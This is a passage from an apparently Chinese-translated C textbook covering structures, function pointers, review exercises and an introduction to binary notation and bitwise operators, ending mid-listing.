下面是该程序的输出示例: Enter a string (empty line to quit): Does C make you feel loopy? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case n) next string t dOES c MAKE YOU FEEL LOOPY? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case n) next string l does c make you feel loopy? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case 1116 n) next string n Enter a string (empty line to quit): Bye! 注意,ToUpper()、ToLower()、Transpose()和 Dummy()函数的类型都相 同,所以这 4 个函数都可以赋给pfun指针。该程序把pfun作为show()的参 数,但是也可以直接把这4个函数中的任一个函数名作为参数,如 show(Transpose, copy)。 这种情况下,可以使用typedef。例如,该程序中可以这样写: typedef void (*V_FP_CHARP)(char *); void show (V_FP_CHARP fp, char *); V_FP_CHARP pfun; 如果还想更复杂一些,可以声明并初始化一个函数指针的数组: V_FP_CHARP arpf[4] = {ToUpper, ToLower, Transpose, Dummy}; 然后把showmenu()函数的返回类型改为int,如果用户输入u,则返回0; 如果用户输入l,则返回2;如果用户输入t,则返回2,以此类推。可以把程 序中的switch语句替换成下面的while循环: index = showmenu(); while (index >= 0 && index <= 3) { strcpy(copy, line);    /* 为show()拷贝一份 */ 1117 show(arpf[index], copy);  /* 使用选定的函数 */ index = showmenu(); } 虽然没有函数数组,但是可以有函数指针数组。 以上介绍了使用函数名的4种方法:定义函数、声明函数、调用函数和 作为指针。图14.4进行了总结。 图14.4 函数名的用法 至于如何处理菜单,showmenu()函数给出了几种技巧。首先,下面的代 码: ans = getchar();    // 获取用户输入 ans = tolower(ans);  // 转换成小写 和 ans = tolower(getchar()); 演示了转换用户输入的两种方法。这两种方法都可以把用户输入的字符 转换为一种大小写形式,这样就不用检测用户输入的是'u'还是'U',等等。 eatline()函数丢弃输入行中的剩余字符,在处理这两种情况时很有用。 第一,用户为了输入一个选择,输入一个字符,然后按下Enter键,将产生 一个换行符。如果不处理这个换行符,它将成为下一次读取的第1个字符。 1118 第二,假设用户输入的是整个单词uppercase,而不是一个字母u。如果 没有 eatline()函数,程序会把uppercase中的字符作为用户的响应依次读取。有了 eatline(),程序会读取u字符并丢弃输入行中剩余的字符。 其次,showmenu()函数的设计意图是,只给程序返回正确的选项。为完 成这项任务,程序使用了string.h头文件中的标准库函数strchr(): while (strchr("ulton", ans) == NULL) 该函数在字符串"ulton"中查找字符ans首次出现的位置,并返回一个指 向该字符的指针。如果没有找到该字符,则返回空指针。因此,上面的 while循环头可以用下面的while循环头代替,但是上面的用起来更方便: while (ans != 'u' && ans != 'l' && ans != 't' && ans != 'o' && ans != 'n') 待检查的项越多,使用strchr()就越方便。 1119 14.15 关键概念 我们在编程中要表示的信息通常不只是一个数字或一些列数字。程序可 能要处理具有多种属性的实体。例如,通过姓名、地址、电话号码和其他信 息表示一名客户;或者,通过电影名、发行人、播放时长、售价等表示一部 电影DVD。C结构可以把这些信息都放在一个单元内。在组织程序时这很重 要,因为这样可以把相关的信息都储存在一处,而不是分散储存在多个变量 中。 设计结构时,开发一个与之配套的函数包通常很有用。例如,写一个以 结构(或结构的地址)为参数的函数打印结构内容,比用一堆printf()语句强 得多。因为只需要一个参数就能打印结构中的所有信息。如果把信息放到零 散的变量中,每个部分都需要一个参数。另外,如果要在结构中增加一个成 员,只需重写函数,不必改写函数调用。这在修改结构时很方便。 联合声明与结构声明类似。但是,联合的成员共享相同的存储空间,而 且在联合中同一时间内只能有一个成员。实质上,可以在联合变量中储存一 个类型不唯一的值。 enum 工具提供一种定义符号常量的方法,typedef 工具提供一种为基本 或派生类型创建新标识符的方法。 指向函数的指针提供一种告诉函数应使用哪一个函数的方法。 1120 14.16 本章小结 C 结构提供在相同的数据对象中储存多个不同类型数据项的方法。可以 使用标记来标识一个具体的结构模板,并声明该类型的变量。通过成员点运 算符(.)可以使用结构模版中的标签来访问结构的各个成员。 如果有一个指向结构的指针,可以用该指针和间接成员运算符(->)代 替结构名和点运算符来访问结构的各成员。和数组不同,结构名不是结构的 地址,要在结构名前使用&运算符才能获得结构的地址。 一贯以来,与结构相关的函数都使用指向结构的指针作为参数。现在的 C允许把结构作为参数传递,作为返回值和同类型结构之间赋值。然而,传 递结构的地址通常更有效。 联合使用与结构相同的语法。然而,联合的成员共享一个共同的存储空 间。联合同一时间内只能储存一个单独的数据项,不像结构那样同时储存多 种数据类型。也就是说,结构可以同时储存一个int类型数据、一个double类 型数据和一个char类型数据,而相应的联合只能保存一个int类型数据,或者 一个double类型数据,或者一个char类型数据。 通过枚举可以创建一系列代表整型常量(枚举常量)的符号和定义相关 联的枚举类型。 typedef工具可用于建立C标准类型的别名或缩写。 函数名代表函数的地址,可以把函数的地址作为参数传递给其他函数, 然后这些函数就可以使用被指向的函数。如果把特定函数的地址赋给一个名 为pf的函数指针,可以通过以下两种方式调用该函数: #include <math.h> /* 提供sin()函数的原型:double sin(double) */ ... double (*pdf)(double); 1121 double x; pdf = sin; x = (*pdf)(1.2); // 调用sin(1.2) x = pdf(1.2);   // 同样调用 sin(1.2) 1122 14.17 复习题 复习题的参考答案在附录A中。 1.下面的结构模板有什么问题: structure { char itable; int num[20]; char * togs } 2.下面是程序的一部分,输出是什么? #include <stdio.h> struct house { float sqft; int rooms; int stories; char address[40]; }; int main(void) { struct house fruzt = {1560.0, 6, 1, "22 Spiffo Road"}; 1123 struct house *sign; sign = &fruzt; printf("%d %d\n", fruzt.rooms, sign->stories); printf("%s \n", fruzt.address); printf("%c %c\n", sign->address[3], fruzt.address[4]); return 0; } 3.设计一个结构模板储存一个月份名、该月份名的3个字母缩写、该月 的天数以及月份号。 4.定义一个数组,内含12个结构(第3题的结构类型)并初始化为一个 年份(非闰年)。 5.编写一个函数,用户提供月份号,该函数就返回一年中到该月为止 (包括该月)的总天数。假设在所有函数的外部声明了第3题的结构模版和 一个该类型结构的数组。 6.a.假设有下面的 typedef,声明一个内含 10 个指定结构的数组。然 后,单独给成员赋值(或等价字符串),使第3个元素表示一个焦距长度有 500mm,孔径为f/2.0的Remarkata镜头。 typedef struct lens {  /* 描述镜头      */ float foclen;   /* 焦距长度,单位为mm  */ float fstop;    /* 孔径       */ char brand[30];  /* 品牌名称      */ 1124 } LENS; b.重写a,在声明中使用一个待指定初始化器的初始化列表,而不是对 每个成员单独赋值。 7.考虑下面程序片段: struct name { char first[20]; char last[20]; }; struct bem { int limbs; struct name title; char type[30]; }; struct bem * pb; struct bem deb = { 6, { "Berbnazel", "Gwolkapwolk" }, "Arcturan" }; 1125 pb = &deb; a.下面的语句分别打印什么? printf("%d\n", deb.limbs); printf("%s\n", pb->type); printf("%s\n", pb->type + 2); b.如何用结构表示法(两种方法)表示"Gwolkapwolk"? c.编写一个函数,以bem结构的地址作为参数,并以下面的形式输出结 构的内容(假定结构模板在一个名为starfolk.h的头文件中): Berbnazel Gwolkapwolk is a 6-limbed Arcturan. 8.考虑下面的声明: struct fullname { char fname[20]; char lname[20]; }; struct bard { struct fullname name; int born; int died; }; 1126 struct bard willie; struct bard *pt = &willie; a.用willie标识符标识willie结构的born成员。 b.用pt标识符标识willie结构的born成员。 c.调用scanf()读入一个用willie标识符标识的born成员的值。 d.调用scanf()读入一个用pt标识符标识的born成员的值。 e.调用scanf()读入一个用willie标识符标识的name成员中lname成员的 值。 f.调用scanf()读入一个用pt标识符标识的name成员中lname成员的值。 g.构造一个标识符,标识willie结构变量所表示的姓名中名的第3个字母 (英文的名在前)。 h.构造一个表达式,表示willie结构变量所表示的名和姓中的字母总 数。 9.定义一个结构模板以储存这些项:汽车名、马力、EPA(美国环保 局)城市交通MPG(每加仑燃料行驶的英里数)评级、轴距和出厂年份。 使用car作为该模版的标记。 10.假设有如下结构: struct gas { float distance; float gals; float mpg; 1127 }; a.设计一个函数,接受struct gas类型的参数。假设传入的结构包含 distance和gals信息。该函数为mpg成员计算正确的值,并把值返回该结构。 b.设计一个函数,接受struct gas类型的参数。假设传入的结构包含 distance和gals信息。该函数为mpg成员计算正确的值,并把该值赋给合适的 成员。 11.声明一个标记为choices的枚举,把枚举常量no、yes和maybe分别设置 为0、1、2。 12.声明一个指向函数的指针,该函数返回指向char的指针,接受一个指 向char的指针和一个char类型的值。 13.声明4个函数,并初始化一个指向这些函数的指针数组。每个函数都 接受两个double类型的参数,返回double类型的值。另外,用两种方法使用 该数组调用带10.0和2.5实参的第2个函数。 1128 14.18 编程练习 1.重新编写复习题 5,用月份名的拼写代替月份号(别忘了使用 strcmp())。在一个简单的程序中测试该函数。 2.编写一个函数,提示用户输入日、月和年。月份可以是月份号、月份 名或月份名缩写。然后该程序应返回一年中到用户指定日子(包括这一天) 的总天数。 3.修改程序清单 14.2 中的图书目录程序,使其按照输入图书的顺序输出 图书的信息,然后按照标题字母的声明输出图书的信息,最后按照价格的升 序输出图书的信息。 4.编写一个程序,创建一个有两个成员的结构模板: a.第1个成员是社会保险号,第2个成员是一个有3个成员的结构,第1个 成员代表名,第2个成员代表中间名,第3个成员表示姓。创建并初始化一个 内含5个该类型结构的数组。该程序以下面的格式打印数据: Dribble, Flossie M.–– 302039823 如果有中间名,只打印它的第1个字母,后面加一个点(.);如果没有 中间名,则不用打印点。编写一个程序进行打印,把结构数组传递给这个函 数。 b.修改a部分,传递结构的值而不是结构的地址。 5.编写一个程序满足下面的要求。 a.外部定义一个有两个成员的结构模板name:一个字符串储存名,一个 字符串储存姓。 b.外部定义一个有3个成员的结构模板student:一个name类型的结构, 一个grade数组储存3个浮点型分数,一个变量储存3个分数平均数。 1129 c.在main()函数中声明一个内含CSIZE(CSIZE = 4)个student类型结构的 数组,并初始化这些结构的名字部分。用函数执行g、e、f和g中描述的任 务。 d.以交互的方式获取每个学生的成绩,提示用户输入学生的姓名和分 数。把分数储存到grade数组相应的结构中。可以在main()函数或其他函数中 用循环来完成。 e.计算每个结构的平均分,并把计算后的值赋给合适的成员。 f.打印每个结构的信息。 g.打印班级的平均分,即所有结构的数值成员的平均值。 6.一个文本文件中保存着一个垒球队的信息。每行数据都是这样排列: 4 Jessie Joybat 5 2 1 1 第1项是球员号,为方便起见,其范围是0~18。第2项是球员的名。第3 项是球员的姓。名和姓都是一个单词。第4项是官方统计的球员上场次数。 接着3项分别是击中数、走垒数和打点(RBI)。文件可能包含多场比赛的 数据,所以同一位球员可能有多行数据,而且同一位球员的多行数据之间可 能有其他球员的数据。编写一个程序,把数据储存到一个结构数组中。该结 构中的成员要分别表示球员的名、姓、上场次数、击中数、走垒数、打点和 安打率(稍后计算)。可以使用球员号作为数组的索引。该程序要读到文件 结尾,并统计每位球员的各项累计总和。 世界棒球统计与之相关。例如,一次走垒和触垒中的失误不计入上场次 数,但是可能产生一个RBI。但是该程序要做的是像下面描述的一样读取和 处理数据文件,不会关心数据的实际含义。 要实现这些功能,最简单的方法是把结构的内容都初始化为零,把文件 中的数据读入临时变量中,然后将其加入相应的结构中。程序读完文件后, 应计算每位球员的安打率,并把计算结果储存到结构的相应成员中。计算安 1130 打率是用球员的累计击中数除以上场累计次数。这是一个浮点数计算。最 后,程序结合整个球队的统计数据,一行显示一位球员的累计数据。 7.修改程序清单 14.14,从文件中读取每条记录并显示出来,允许用户 删除记录或修改记录的内容。如果删除记录,把空出来的空间留给下一个要 读入的记录。要修改现有的文件内容,必须用"r+b"模式,而不是"a+b"模 式。而且,必须更加注意定位文件指针,防止新加入的记录覆盖现有记录。 最简单的方法是改动储存在内存中的所有数据,然后再把最后的信息写入文 件。跟踪的一个方法是在book结构中添加一个成员表示是否该项被删除。 8.巨人航空公司的机群由 12 个座位的飞机组成。它每天飞行一个航 班。根据下面的要求,编写一个座位预订程序。 a.该程序使用一个内含 12 个结构的数组。每个结构中包括:一个成员 表示座位编号、一个成员表示座位是否已被预订、一个成员表示预订人的 名、一个成员表示预订人的姓。 b.该程序显示下面的菜单: To choose a function, enter its letter label: a) Show number of empty seats b) Show list of empty seats c) Show alphabetical list of seats d) Assign a customer to a seat assignment e) Delete a seat assignment f) Quit c.该程序能成功执行上面给出的菜单。选择d)和e)要提示用户进行额外 输入,每个选项都能让用户中止输入。 1131 d.执行特定程序后,该程序再次显示菜单,除非用户选择f)。 9.巨人航空公司(编程练习 8)需要另一架飞机(容量相同),每天飞 4 班(航班 102、311、444 和519)。把程序扩展为可以处理4个航班。用一 个顶层菜单提供航班选择和退出。选择一个特定航班,就会出现和编程练习 8类似的菜单。但是该菜单要添加一个新选项:确认座位分配。而且,菜单 中的退出是返回顶层菜单。每次显示都要指明当前正在处理的航班号。另 外,座位分配显示要指明确认状态。 10.编写一个程序,通过一个函数指针数组实现菜单。例如,选择菜单 中的 a,将激活由该数组第 1个元素指向的函数。 11.编写一个名为transform()的函数,接受4个参数:内含double类型数据 的源数组名、内含double类型数据的目标数组名、一个表示数组元素个数的 int类型参数、函数名(或等价的函数指针)。transform()函数应把指定函数 应用于源数组中的每个元素,并把返回值储存在目标数组中。例如: transform(source, target, 100, sin); 该声明会把target[0]设置为sin(source[0]),等等,共有100个元素。在一 个程序中调用transform()4次,以测试该函数。分别使用math.h函数库中的两 个函数以及自定义的两个函数作为参数。 [1].也被称为标记化结构初始化语法。——译者注 1132 第15章 位操作 本章介绍以下内容: 运算符:~、&、|、^、 <<、>> &=、|=、^=、>>=、<<= 二进制、十进制和十六进制记数法(复习) 处理一个值中的位的两个C工具:位运算符和位字段 关键字:_Alignas、_Alignof 在C语言中,可以单独操控变量中的位。读者可能好奇,竟然有人想这 样做。有时必须单独操控位,而且非常有用。例如,通常向硬件设备发送一 两个字节来控制这些设备,其中每个位(bit)都有特定的含义。另外,与 文件相关的操作系统信息经常被储存,通过使用特定位表明特定项。许多压 缩和加密操作都是直接处理单独的位。高级语言一般不会处理这级别的细 节,C 在提供高级语言便利的同时,还能在为汇编语言所保留的级别上工 作,这使其成为编写设备驱动程序和嵌入式代码的首选语言。 首先要介绍位、字节、二进制记数法和其他进制记数系统的一些背景知 识。 1133 15.1 二进制数、位和字节 通常都是基于数字10来书写数字。例如2157的千位是2,百位是1,十位 是5,个位是7,可以写成: 2×1000 + 1×100 + 5×10 + 7×1 注意,1000是10的立方(即3次幂),100是10的平方(即2次幂),10 是10的1次幂,而且10(以及任意正数)的0次幂是1。因此,2157也可以写 成: 2×103+ 1×102+ 5×101+ 7×100 因为这种书写数字的方法是基于10的幂,所以称以10为基底书写2157。 姑且认为十进制系统得以发展是得益于我们都有10根手指。从某种意义 上看,计算机的位只有2根手指,因为它只能被设置为0或1,关闭或打开。 因此,计算机适用基底为2的数制系统。它用2的幂而不是10的幂。以2为基 底表示的数字被称为二进制数(binary number)。二进制中的2和十进制中 的10作用相同。例如,二进制数1101可表示为: 1×23+ 1×22+ 0×21+ 1×20 以十进制数表示为: 1×8 + 1×4 + 0×2 + 1×1 = 13 用二进制系统可以把任意整数(如果有足够的位)表示为0和1的组合。 由于数字计算机通过关闭和打开状态的组合来表示信息,这两种状态分别用 0和1来表示,所以使用这套数制系统非常方便。接下来,我们来学习二进制 系统如何表示1字节的整数。 15.1.1 二进制整数 1134 通常,1字节包含8位。C语言用字节(byte)表示储存系统字符集所需 的大小,所以C字节可能是8位、9位、16位或其他值。不过,描述存储器芯 片和数据传输率中所用的字节指的是8位字节。为了简化起见,本章假设1字 节是8位(计算机界通常用八位组(octet)这个术语特指8位字节)。可以从左 往右给这8位分别编号为7~0。在1字节中,编号是7的位被称为高阶位 (high-order bit),编号是0的位被称为低阶位(low-order bit)。每 1位的 编号对应2的相应指数。因此,可以根据图15.1所示的例子理解字节。 图15.1 位编号和位值 这里,128是2的7次幂,以此类推。该字节能表示的最大数字是把所有 位都设置为1:11111111。这个二进制数的值是: 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 = 255 而该字节最小的二进制数是00000000,其值为0。因此,1字节可储存0 ~255范围内的数字,总共256个值。或者,通过不同的方式解释位组合 (bit pattern),程序可以用1字节储存-128~+127范围内的整数,总共还是 256个值。例如,通常unsigned char用1字节表示的范围是0~255,而signed char用1字节表示的范围是-128~+127。 15.1.2 有符号整数 如何表示有符号整数取决于硬件,而不是C语言。也许表示有符号数最 简单的方式是用1位(如,高阶位)储存符号,只剩下7位表示数字本身(假 1135 设储存在1字节中)。用这种符号量(sign-magnitude)表示法,10000001表 示−1,00000001表示1。因此,其表示范围是−127~+127。 这种方法的缺点是有两个0:+0和-0。这很容易混淆,而且用两个位组 合来表示一个值也有些浪费。 二进制补码(two’s-complement)方法避免了这个问题,是当今最常用 的系统。我们将以1字节为例,讨论这种方法。二进制补码用1字节中的后7 位表示0~127,高阶位设置为0。目前,这种方法和符号量的方法相同。另 外,如果高阶位是1,表示的值为负。这两种方法的区别在于如何确定负 值。从一个9位组合100000000(256的二进制形式)减去一个负数的位组 合,结果是该负值的量。例如,假设一个负值的位组合是 10000000,作为 一个无符号字节,该组合为表示 128;作为一个有符号值,该组合表示负值 (编码是 7的位为1),而且值为100000000-10000000,即 1000000(128)。因此,该数是-128(在符号量表示法中,该位组合表示 −0)。类似地,10000001 是−127,11111111 是−1。该方法可以表示−128~ +127范围内的数。 要得到一个二进制补码数的相反数,最简单的方法是反转每一位(即0 变为1,1变为0),然后加1。因为1是00000001,那么−1则是11111110+1, 或11111111。这与上面的介绍一致。 二进制反码(one’s-complement)方法通过反转位组合中的每一位形成 一个负数。例如,00000001是1,那么11111110是−1。这种方法也有一个 −0:11111111。该方法能表示-127~+127之间的数。 15.1.3 二进制浮点数 浮点数分两部分储存:二进制小数和二进制指数。下面我们将详细介 绍。 1.二进制小数 1136 一个普通的浮点数0.527,表示如下: 5/10 + 2/100 + 7/1000 从左往右,各分母都是10的递增次幂。在二进制小数中,使用2的幂作 为分母,所以二进制小数.101表示为: 1/2 + 0/4 + 1/8 用十进制表示法为: 0.50 + 0.00 + 0.125 即是0.625。 许多分数(如,1/3)不能用十进制表示法精确地表示。与此类似,许 多分数也不能用二进制表示法准确地表示。实际上,二进制表示法只能精确 地表示多个1/2的幂的和。因此,3/4和7/8可以精确地表示为二进制小数,但 是1/3和2/5却不能。 2.浮点数表示法 为了在计算机中表示一个浮点数,要留出若干位(因系统而异)储存二 进制分数,其他位储存指数。一般而言,数字的实际值是由二进制小数乘以 2的指定次幂组成。例如,一个浮点数乘以4,那么二进制小数不变,其指数 乘以2,二进制分数不变。如果一份浮点数乘以一个不是2的幂的数,会改变 二进制小数部分,如有必要,也会改变指数部分。 1137 15.2 其他进制数 计算机界通常使用八进制记数系统和十六进制记数系统。因为8和16都 是2的幂,这些系统比十进制系统更接近计算机的二进制系统。 15.2.1 八进制 八进制(octal)是指八进制记数系统。该系统基于8的幂,用0~7表示 数字(正如十进制用0~9表示数字一样)。例如,八进制数451(在C中写 作0451)表示为: 4×82+ 5×81+ 1×80= 297(十进制) 了解八进制的一个简单的方法是,每个八进制位对应3个二进制位。表 15.1列出了这种对应关系。这种关系使得八进制与二进制之间的转换很容 易。例如,八进制数0377的二进制形式是11111111。即,用111代替0377中 的最后一个7,再用111代替倒数第2个7,最后用011代替3,并舍去第1位的 0。这表明比0377大的八进制要用多个字节表示。这是八进制唯一不方便的 地方:一个3位的八进制数可能要用9位二进制数来表示。注意,将八进制数 转换为二进制形式时,不能去掉中间的0。例如,八进制数0173的二进制形 式是01111011,不是0111111。 表15.1 与八进制位等价的二进制位 15.2.2 十六进制 十六进制(hexadecimal或hex)是指十六进制记数系统。该系统基于16 的幂,用0~15表示数字。但是,由于没有单独的数(digit,即0~9这样单 1138 独一位的数)表示10~15,所以用字母A~F来表示。例如,十六进制数 A3F(在C中写作0xA3F)表示为: 10×162+3×161+ 15×160= 2623(十进制) 由于A表示10,F表示15。在C语言中,A~F既可用小写也可用大写。 因此,2623也可写作0xa3f。 每个十六进制位都对应一个4位的二进制数(即4个二进制位),那么两 个十六进制位恰好对应一个8位字节。第1个十六进制表示前4位,第2个十六 进制位表示后4位。因此,十六进制很适合表示字节值。 表15.2列出了各进制之间的对应关系。例如,十六进制值0xC2可转换为 11000010。相反,二进制值11010101可以看作是1101 0101,可转换为 0xD5。 表15.2 十进制、十六进制和等价的二进制 介绍了位和字节的相关内容,接下来我们研究C用位和字节进行哪些操 作。C有两个操控位的工具。第 1 个工具是一套(6 个)作用于位的按位运 算符。第 2 个工具是字段(field)数据形式,用于访问 int中的位。下面将 简要介绍这些C的特性。 1139 15.3 C按位运算符 C 提供按位逻辑运算符和移位运算符。在下面的例子中,为了方便读者 了解位的操作,我们用二进制记数法写出值。但是在实际的程序中不必这 样,用一般形式的整型变量或常量即可。例如,在程序中用25或031或 0x19,而不是00011001。另外,下面的例子均使用8位二进制数,从左往右 每位的编号为7~0。 15.3.1 按位逻辑运算符 4个按位逻辑运算符都用于整型数据,包括char。之所以叫作按位 (bitwise)运算,是因为这些操作都是针对每一个位进行,不影响它左右两 边的位。不要把这些运算符与常规的逻辑运算符(&&、||和!)混淆,常规 的逻辑运算符操作的是整个值。 1.二进制反码或按位取反:~ 一元运算符~把1变为0,把0变为1。如下例子所示: ~(10011010) // 表达式 (01100101)  // 结果值 假设val的类型是unsigned char,已被赋值为2。在二进制中,00000010 表示2。那么,~val的值是11111101,即253。注意,该运算符不会改变val 的值,就像3 * val不会改变val的值一样, val仍然是2。但是,该运算符确实 创建了一个可以使用或赋值的新值: newval = ~val; printf("%d", ~val); 如果要把val的值改为~val,使用下面这条语句: 1140 val = ~val; 2.按位与:& 二元运算符&通过逐位比较两个运算对象,生成一个新值。对于每个 位,只有两个运算对象中相应的位都为1时,结果才为1(从真/假方面看, 只有当两个位都为真时,结果才为真)。因此,对下面的表达式求值: (10010011) & (00111101)  // 表达式 由于两个运算对象中编号为4和0的位都为1,得: (00010001)  // 结果值 C有一个按位与和赋值结合的运算符:&=。下面两条语句产生的最终结 果相同: val &= 0377; val = val & 0377; 3.按位或:| 二元运算符|,通过逐位比较两个运算对象,生成一个新值。对于每个 位,如果两个运算对象中相应的位为1,结果就为1(从真/假方面看,如果 两个运算对象中相应的一个位为真或两个位都为真,那么结果为真)。因 此,对下面的表达式求值: (10010011) | (00111101) // 表达式 除了编号为6的位,这两个运算对象的其他位至少有一个位为1,得: (10111111) // 结果值 C有一个按位或和赋值结合的运算符:|=。下面两条语句产生的最终作 用相同: 1141 val |= 0377; val = val | 0377; 4.按位异或:^ 二元运算符^逐位比较两个运算对象。对于每个位,如果两个运算对象 中相应的位一个为1(但不是两个为1),结果为1(从真/假方面看,如果两 个运算对象中相应的一个位为真且不是两个为同为1,那么结果为真)。因 此,对下面表达式求值: (10010011) ^ (00111101) // 表达式 编号为0的位都是1,所以结果为0,得: (10101110)  // 结果值 C有一个按位异或和赋值结合的运算符:^=。下面两条语句产生的最终 作用相同: val ^= 0377; val = val ^ 0377; 15.3.2 用法:掩码 按位与运算符常用于掩码(mask)。所谓掩码指的是一些设置为开 (1)或关(0)的位组合。要明白称其为掩码的原因,先来看通过&把一个 量与掩码结合后发生什么情况。例如,假设定义符号常量MASK为2 (即, 二进制形式为00000010),只有1号位是1,其他位都是0。下面的语句: flags = flags & MASK; 把flags中除1号位以外的所有位都设置为0,因为使用按位与运算符 (&)任何位与0组合都得0。1号位的值不变(如果1号位是1,那么 1&1得 1142 1;如果 1号位是0,那么 0&1也得0)。这个过程叫作“使用掩码”,因为掩 码中的0隐藏了flags中相应的位。 可以这样类比:把掩码中的0看作不透明,1看作透明。表达式flags & MASK相当于用掩码覆盖在flags的位组合上,只有MASK为1的位才可见(见 图15.2)。 图15.2 掩码示例 用&=运算符可以简化前面的代码,如下所示: flags &= MASK; 下面这条语句是按位与的一种常见用法: ch &= 0xff; /* 或者 ch &= 0377; */ 前面介绍过oxff的二进制形式是11111111,八进制形式是0377。这个掩 码保持ch中最后8位不变,其他位都设置为0。无论ch原来是8位、16位或是 其他更多位,最终的值都被修改为1个8位字节。在该例中,掩码的宽度为8 1143 位。 15.3.3 用法:打开位(设置位) 有时,需要打开一个值中的特定位,同时保持其他位不变。例如,一台 IBM PC 通过向端口发送值来控制硬件。例如,为了打开内置扬声器,必须 打开 1 号位,同时保持其他位不变。这种情况可以使用按位或运算符 (|)。 以上一节的flags和MASK(只有1号位为1)为例。下面的语句: flags = flags | MASK; 把flags的1号位设置为1,且其他位不变。因为使用|运算符,任何位与0 组合,结果都为本身;任何位与1组合,结果都为1。 例如,假设flags是00001111,MASK是10110110。下面的表达式: flags | MASK 即是: (00001111) | (10110110)  // 表达式 其结果为: (10111111)         // 结果值 MASK中为1的位,flags与其对应的位也为1。MASK中为0的位,flags与 其对应的位不变。 用|=运算符可以简化上面的代码,如下所示: flags |= MASK; 同样,这种方法根据MASK中为1的位,把flags中对应的位设置为1,其 1144 他位不变。 15.3.4 用法:关闭位(清空位) 和打开特定的位类似,有时也需要在不影响其他位的情况下关闭指定的 位。假设要关闭变量flags中的1号位。同样,MASK只有1号位为1(即,打 开)。可以这样做: flags = flags & ~MASK; 由于MASK除1号位为1以外,其他位全为0,所以~MASK除1号位为0 以外,其他位全为1。使用&,任何位与1组合都得本身,所以这条语句保持 1号位不变,改变其他各位。另外,使用&,任何位与0组合都的0。所以无 论1号位的初始值是什么,都将其设置为0。 例如,假设flags是00001111,MASK是10110110。下面的表达式: flags & ~MASK 即是: (00001111) & ~(10110110) // 表达式 其结果为: (00001001)         // 结果值 MASK中为1的位在结果中都被设置(清空)为0。flags中与MASK为0的 位相应的位在结果中都未改变。 可以使用下面的简化形式: flags &= ~MASK; 15.3.5 用法:切换位 1145 切换位指的是打开已关闭的位,或关闭已打开的位。可以使用按位异或 运算符(^)切换位。也就是说,假设b是一个位(1或0),如果b为1,则 1^b为0;如果b为0,则1^b为1。另外,无论b为1还是0,0^b均为b。因此, 如果使用^组合一个值和一个掩码,将切换该值与MASK为1的位相对应的 位,该 值与MASK为0的位相对应的位不变。要切换flags中的1号位,可以使用 下面两种方法: flags = flags ^ MASK; flags ^= MASK; 例如,假设flags是00001111,MASK是10110110。表达式: flags ^ MASK 即是: (00001111) ^ (10110110)  // 表达式 其结果为: (10111001)         // 结果值 flags中与MASK为1的位相对应的位都被切换了,MASK为0的位相对应 的位不变。 15.3.6 用法:检查位的值 前面介绍了如何改变位的值。有时,需要检查某位的值。例如,flags中 1号位是否被设置为1?不能这样直接比较flags和MASK: if (flags == MASK) puts("Wow!"); /* 不能正常工作 */ 1146 这样做即使flags的1号位为1,其他位的值会导致比较结果为假。因此, 必须覆盖flags中的其他位,只用1号位和MASK比较: if ((flags & MASK) == MASK) puts("Wow!"); 由于按位运算符的优先级比==低,所以必须在flags & MASK周围加上 圆括号。 为了避免信息漏过边界,掩码至少要与其覆盖的值宽度相同。 15.3.7 移位运算符 下面介绍C的移位运算符。移位运算符向左或向右移动位。同样,我们 在示例中仍然使用二进制数,有助于读者理解其工作原理。 1.左移:<< 左移运算符(<<)将其左侧运算对象每一位的值向左移动其右侧运算 对象指定的位数。左侧运算对象移出左末端位的值丢失,用0填充空出的位 置。下面的例子中,每一位都向左移动两个位置: (10001010) << 2  // 表达式 (00101000)    // 结果值 该操作产生了一个新的位值,但是不改变其运算对象。例如,假设 stonk为1,那么 stonk<<2为4,但是stonk本身不变,仍为1。可以使用左移赋 值运算符(<<=)来更改变量的值。该运算符将变量中的位向左移动其右侧 运算对象给定值的位数。如下例: int stonk = 1; int onkoo; 1147 onkoo = stonk << 2;  /* 把4赋给onkoo */ stonk <<= 2;     /* 把stonk的值改为4 */ 2.右移:>> 右移运算符(>>)将其左侧运算对象每一位的值向右移动其右侧运算 对象指定的位数。左侧运算对象移出右末端位的值丢。对于无符号类型,用 0 填充空出的位置;对于有符号类型,其结果取决于机器。空出的位置可用 0填充,或者用符号位(即,最左端的位)的副本填充: (10001010) >> 2    // 表达式,有符号值 (00100010)       // 在某些系统中的结果值 (10001010) >> 2    // 表达式,有符号值 (11100010)       // 在另一些系统上的结果值 下面是无符号值的例子: (10001010) >> 2    // 表达式,无符号值 (00100010)       // 所有系统都得到该结果值 每个位向右移动两个位置,空出的位用0填充。 右移赋值运算符(>>=)将其左侧的变量向右移动指定数量的位数。如 下所示: int sweet = 16; int ooosw; ooosw = sweet >> 3;  // ooosw = 2,sweet的值仍然为16 1148 sweet >>=3;      // sweet的值为2 3.用法:移位运算符 移位运算符针对2的幂提供快速有效的乘法和除法: number << n    number乘以2的n次幂 number >> n    如果number为非负,则用number除以2的n次幂 这些移位运算符类似于在十进制中移动小数点来乘以或除以10。 移位运算符还可用于从较大单元中提取一些位。例如,假设用一个 unsigned long类型的值表示颜色值,低阶位字节储存红色的强度,下一个字 节储存绿色的强度,第 3 个字节储存蓝色的强度。随后你希望把每种颜色的 强度分别储存在3个不同的unsigned char类型的变量中。那么,可以使用下面 的语句: #define BYTE_MASK 0xff unsigned long color = 0x002a162f; unsigned char blue, green, red; red = color & BYTE_MASK; green = (color >> 8) & BYTE_MASK; blue = (color >> 16) & BYTE_MASK; 以上代码中,使用右移运算符将 8 位颜色值移动至低阶字节,然后使用 掩码技术把低阶字节赋给指定的变量。 15.3.8 编程示例 在第 9 章中,我们用递归的方法编写了一个程序,把数字转换为二进制 1149 形式(程序清单 9.8)。现在,要用移位运算符来解决相同的问题。程序清 单15.1中的程序,读取用户从键盘输入的整数,将该整数和一个字符串地址 传递给itobs()函数(itobs表示interger to binary string,即整数转换成二进制字 符串)。然后,该函数使用移位运算符计算出正确的1和0的组合,并将其放 入字符串中。 程序清单15.1 binbit.c程序 /* binbit.c -- 使用位操作显示二进制 */ #include <stdio.h> #include <limits.h> // 提供 CHAR_BIT 的定义,CHAR_BIT 表示每字节 的位数 char * itobs(int, char *); void show_bstr(const char *); int main(void) { char bin_str[CHAR_BIT * sizeof(int) + 1]; int number; puts("Enter integers and see them in binary."); puts("Non-numeric input terminates program."); while (scanf("%d", &number) == 1) { itobs(number, bin_str); 1150 printf("%d is ", number); 